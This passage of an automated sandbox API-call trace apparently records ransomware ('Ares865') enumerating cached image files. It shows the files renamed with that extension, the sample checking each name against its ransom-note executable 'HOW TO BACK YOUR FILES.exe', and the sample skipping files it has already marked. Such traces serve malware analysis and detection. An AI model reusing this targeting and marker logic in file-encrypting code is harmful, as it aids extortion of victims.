lpString2="Ares865") returned 0 [0110.887] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x459ad690, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x459ad690, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a164220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEeEwt[1].jpg.Ares865", cAlternateFileName="BBEEEW~1.ARE")) returned 1 [0110.887] lstrcmpiW (lpString1="BBEeEwt[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.887] lstrcmpiW (lpString1="BBEeEwt[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.888] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEeEwt[1].jpg.Ares865" | out: lpString1="BBEeEwt[1].jpg.Ares865") returned="BBEeEwt[1].jpg.Ares865" [0110.888] lstrlenW (lpString="BBEeEwt[1].jpg.Ares865") returned 22 [0110.888] lstrlenW (lpString="Ares865") returned 7 [0110.888] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.888] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4593b270, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4593b270, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a164220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xae0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEeis3[1].jpg.Ares865", cAlternateFileName="BBEEIS~1.ARE")) returned 1 [0110.888] lstrcmpiW (lpString1="BBEeis3[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.888] lstrcmpiW (lpString1="BBEeis3[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.888] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEeis3[1].jpg.Ares865" | out: lpString1="BBEeis3[1].jpg.Ares865") returned="BBEeis3[1].jpg.Ares865" [0110.888] lstrlenW (lpString="BBEeis3[1].jpg.Ares865") returned 22 [0110.888] lstrlenW (lpString="Ares865") returned 7 [0110.888] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.888] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45a1fab0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45a1fab0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a164220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEeKvV[1].jpg.Ares865", cAlternateFileName="BBEEKV~1.ARE")) returned 1 [0110.888] lstrcmpiW (lpString1="BBEeKvV[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.888] lstrcmpiW (lpString1="BBEeKvV[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.888] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEeKvV[1].jpg.Ares865" | out: lpString1="BBEeKvV[1].jpg.Ares865") returned="BBEeKvV[1].jpg.Ares865" [0110.888] lstrlenW (lpString="BBEeKvV[1].jpg.Ares865") returned 22 [0110.888] lstrlenW (lpString="Ares865") returned 7 [0110.888] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.888] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45a91ed0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45a91ed0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a18a380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xf200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEeNd8[1].png.Ares865", cAlternateFileName="BBEEND~1.ARE")) returned 1 [0110.888] lstrcmpiW (lpString1="BBEeNd8[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.888] lstrcmpiW (lpString1="BBEeNd8[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.889] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEeNd8[1].png.Ares865" | out: lpString1="BBEeNd8[1].png.Ares865") returned="BBEeNd8[1].png.Ares865" [0110.889] lstrlenW (lpString="BBEeNd8[1].png.Ares865") returned 22 [0110.889] lstrlenW (lpString="Ares865") returned 7 [0110.889] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.889] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45ab8030, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45ab8030, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a18a380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3630, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEewZB[1].jpg.Ares865", cAlternateFileName="BBEEWZ~1.ARE")) returned 1 [0110.889] lstrcmpiW (lpString1="BBEewZB[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.889] lstrcmpiW (lpString1="BBEewZB[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.889] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEewZB[1].jpg.Ares865" | out: lpString1="BBEewZB[1].jpg.Ares865") returned="BBEewZB[1].jpg.Ares865" [0110.889] lstrlenW (lpString="BBEewZB[1].jpg.Ares865") returned 22 [0110.889] lstrlenW (lpString="Ares865") returned 7 [0110.889] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.889] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x459613d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x459613d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a1b04e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xce0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEeZ0k[1].jpg.Ares865", cAlternateFileName="BBEEZ0~1.ARE")) returned 1 [0110.889] lstrcmpiW (lpString1="BBEeZ0k[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.889] lstrcmpiW (lpString1="BBEeZ0k[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.889] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEeZ0k[1].jpg.Ares865" | out: lpString1="BBEeZ0k[1].jpg.Ares865") returned="BBEeZ0k[1].jpg.Ares865" [0110.889] lstrlenW (lpString="BBEeZ0k[1].jpg.Ares865") returned 22 [0110.889] lstrlenW (lpString="Ares865") returned 7 [0110.889] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.889] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b042f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45b042f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a1b04e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEf6s4[1].jpg.Ares865", cAlternateFileName="BBEF6S~1.ARE")) returned 1 [0110.889] lstrcmpiW (lpString1="BBEf6s4[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.889] lstrcmpiW (lpString1="BBEf6s4[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.890] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEf6s4[1].jpg.Ares865" | out: lpString1="BBEf6s4[1].jpg.Ares865") returned="BBEf6s4[1].jpg.Ares865" [0110.890] lstrlenW (lpString="BBEf6s4[1].jpg.Ares865") returned 22 [0110.890] lstrlenW (lpString="Ares865") returned 7 [0110.890] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.890] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b2a450, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45b2a450, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a1d6640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfAc5[1].jpg.Ares865", cAlternateFileName="BBEFAC~1.ARE")) returned 1 [0110.890] lstrcmpiW (lpString1="BBEfAc5[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.890] lstrcmpiW (lpString1="BBEfAc5[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.890] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfAc5[1].jpg.Ares865" | out: lpString1="BBEfAc5[1].jpg.Ares865") returned="BBEfAc5[1].jpg.Ares865" [0110.890] lstrlenW (lpString="BBEfAc5[1].jpg.Ares865") returned 22 [0110.890] lstrlenW (lpString="Ares865") returned 7 [0110.890] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.890] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45510bf0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45510bf0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a1d6640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1c80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfgDi[1].jpg.Ares865", cAlternateFileName="BBEFGD~1.ARE")) returned 1 [0110.890] lstrcmpiW (lpString1="BBEfgDi[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.890] lstrcmpiW (lpString1="BBEfgDi[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.890] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfgDi[1].jpg.Ares865" | out: lpString1="BBEfgDi[1].jpg.Ares865") returned="BBEfgDi[1].jpg.Ares865" [0110.890] lstrlenW (lpString="BBEfgDi[1].jpg.Ares865") returned 22 [0110.890] lstrlenW (lpString="Ares865") returned 7 [0110.890] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.890] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x456d9c70, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x456d9c70, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a1fc7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xe80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfjuT[1].jpg.Ares865", cAlternateFileName="BBEFJU~1.ARE")) returned 1 [0110.890] lstrcmpiW (lpString1="BBEfjuT[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.890] lstrcmpiW (lpString1="BBEfjuT[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.891] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfjuT[1].jpg.Ares865" | out: lpString1="BBEfjuT[1].jpg.Ares865") returned="BBEfjuT[1].jpg.Ares865" [0110.891] lstrlenW (lpString="BBEfjuT[1].jpg.Ares865") returned 22 [0110.891] lstrlenW (lpString="Ares865") returned 7 [0110.891] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.891] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x457be4b0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x457be4b0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a1fc7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1e20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfkgi[1].jpg.Ares865", cAlternateFileName="BBEFKG~1.ARE")) returned 1 [0110.891] lstrcmpiW (lpString1="BBEfkgi[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.891] lstrcmpiW (lpString1="BBEfkgi[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.891] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfkgi[1].jpg.Ares865" | out: lpString1="BBEfkgi[1].jpg.Ares865") returned="BBEfkgi[1].jpg.Ares865" [0110.891] lstrlenW (lpString="BBEfkgi[1].jpg.Ares865") returned 22 [0110.891] lstrlenW (lpString="Ares865") returned 7 [0110.891] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.891] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45915110, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45915110, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a222900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2c80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfRKA[1].jpg.Ares865", cAlternateFileName="BBEFRK~1.ARE")) returned 1 [0110.891] lstrcmpiW (lpString1="BBEfRKA[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.891] lstrcmpiW (lpString1="BBEfRKA[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.891] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfRKA[1].jpg.Ares865" | out: lpString1="BBEfRKA[1].jpg.Ares865") returned="BBEfRKA[1].jpg.Ares865" [0110.891] lstrlenW (lpString="BBEfRKA[1].jpg.Ares865") returned 22 [0110.891] lstrlenW (lpString="Ares865") returned 7 [0110.891] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.891] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4574c090, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4574c090, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a248a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2e70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfRwv[1].jpg.Ares865", cAlternateFileName="BBEFRW~1.ARE")) returned 1 [0110.891] lstrcmpiW (lpString1="BBEfRwv[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.891] lstrcmpiW (lpString1="BBEfRwv[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.892] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfRwv[1].jpg.Ares865" | out: lpString1="BBEfRwv[1].jpg.Ares865") returned="BBEfRwv[1].jpg.Ares865" [0110.892] lstrlenW (lpString="BBEfRwv[1].jpg.Ares865") returned 22 [0110.892] lstrlenW (lpString="Ares865") returned 7 [0110.892] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.892] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45478670, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45478670, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a248a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfwtU[1].jpg.Ares865", cAlternateFileName="BBEFWT~1.ARE")) returned 1 [0110.892] lstrcmpiW (lpString1="BBEfwtU[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.892] lstrcmpiW (lpString1="BBEfwtU[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.892] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfwtU[1].jpg.Ares865" | out: lpString1="BBEfwtU[1].jpg.Ares865") returned="BBEfwtU[1].jpg.Ares865" [0110.892] lstrlenW (lpString="BBEfwtU[1].jpg.Ares865") returned 22 [0110.892] lstrlenW (lpString="Ares865") returned 7 [0110.892] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.892] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45856a30, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45856a30, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a26ebc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xe50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEfY4X[1].jpg.Ares865", cAlternateFileName="BBEFY4~1.ARE")) returned 1 [0110.892] lstrcmpiW (lpString1="BBEfY4X[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.892] lstrcmpiW (lpString1="BBEfY4X[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.892] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEfY4X[1].jpg.Ares865" | out: lpString1="BBEfY4X[1].jpg.Ares865") returned="BBEfY4X[1].jpg.Ares865" [0110.892] lstrlenW (lpString="BBEfY4X[1].jpg.Ares865") returned 22 [0110.892] lstrlenW (lpString="Ares865") returned 7 [0110.892] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.892] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45725f30, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45725f30, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a26ebc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2900, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEgD9f[1].jpg.Ares865", cAlternateFileName="BBEGD9~1.ARE")) returned 1 [0110.892] lstrcmpiW (lpString1="BBEgD9f[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.892] lstrcmpiW (lpString1="BBEgD9f[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.892] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEgD9f[1].jpg.Ares865" | out: lpString1="BBEgD9f[1].jpg.Ares865") returned="BBEgD9f[1].jpg.Ares865" [0110.893] lstrlenW (lpString="BBEgD9f[1].jpg.Ares865") returned 22 [0110.893] lstrlenW (lpString="Ares865") returned 7 [0110.893] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.893] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45ab8030, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45ab8030, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a294d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEgJfz[1].jpg.Ares865", cAlternateFileName="BBEGJF~1.ARE")) returned 1 [0110.893] lstrcmpiW (lpString1="BBEgJfz[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.893] lstrcmpiW (lpString1="BBEgJfz[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.893] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEgJfz[1].jpg.Ares865" | out: lpString1="BBEgJfz[1].jpg.Ares865") returned="BBEgJfz[1].jpg.Ares865" [0110.893] lstrlenW (lpString="BBEgJfz[1].jpg.Ares865") returned 22 [0110.893] lstrlenW (lpString="Ares865") returned 7 [0110.893] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.893] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b2a450, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45b2a450, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a294d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEgsWA[1].jpg.Ares865", cAlternateFileName="BBEGSW~1.ARE")) returned 1 [0110.893] lstrcmpiW (lpString1="BBEgsWA[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.893] lstrcmpiW (lpString1="BBEgsWA[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.893] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEgsWA[1].jpg.Ares865" | out: lpString1="BBEgsWA[1].jpg.Ares865") returned="BBEgsWA[1].jpg.Ares865" [0110.893] lstrlenW (lpString="BBEgsWA[1].jpg.Ares865") returned 22 [0110.893] lstrlenW (lpString="Ares865") returned 7 [0110.893] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.893] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45725f30, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45725f30, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a294d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEgX5G[1].jpg.Ares865", cAlternateFileName="BBEGX5~1.ARE")) returned 1 [0110.893] lstrcmpiW (lpString1="BBEgX5G[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.893] lstrcmpiW (lpString1="BBEgX5G[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.893] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEgX5G[1].jpg.Ares865" | out: lpString1="BBEgX5G[1].jpg.Ares865") returned="BBEgX5G[1].jpg.Ares865" [0110.894] lstrlenW (lpString="BBEgX5G[1].jpg.Ares865") returned 22 [0110.894] lstrlenW (lpString="Ares865") returned 7 [0110.894] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.894] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x51256470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x51256470, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a294d20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x6b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBih5H[1].png.Ares865", cAlternateFileName="BBIH5H~1.ARE")) returned 1 [0110.894] lstrcmpiW (lpString1="BBih5H[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.894] lstrcmpiW (lpString1="BBih5H[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.894] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBih5H[1].png.Ares865" | out: lpString1="BBih5H[1].png.Ares865") returned="BBih5H[1].png.Ares865" [0110.894] lstrlenW (lpString="BBih5H[1].png.Ares865") returned 21 [0110.894] lstrlenW (lpString="Ares865") returned 7 [0110.894] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.894] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe4ca790, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbe4ca790, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a2bae80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x550, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBmUxRK[1].png.Ares865", cAlternateFileName="BBMUXR~1.ARE")) returned 1 [0110.894] lstrcmpiW (lpString1="BBmUxRK[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.894] lstrcmpiW (lpString1="BBmUxRK[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.894] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBmUxRK[1].png.Ares865" | out: lpString1="BBmUxRK[1].png.Ares865") returned="BBmUxRK[1].png.Ares865" [0110.894] lstrlenW (lpString="BBmUxRK[1].png.Ares865") returned 22 [0110.894] lstrlenW (lpString="Ares865") returned 7 [0110.894] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.894] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x459f9950, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x459f9950, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a2bae80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBndhJA[1].png.Ares865", cAlternateFileName="BBNDHJ~1.ARE")) returned 1 [0110.894] lstrcmpiW (lpString1="BBndhJA[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.895] lstrcmpiW (lpString1="BBndhJA[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.895] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBndhJA[1].png.Ares865" | out: lpString1="BBndhJA[1].png.Ares865") returned="BBndhJA[1].png.Ares865" [0110.895] lstrlenW (lpString="BBndhJA[1].png.Ares865") returned 22 [0110.895] lstrlenW (lpString="Ares865") returned 7 [0110.895] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") 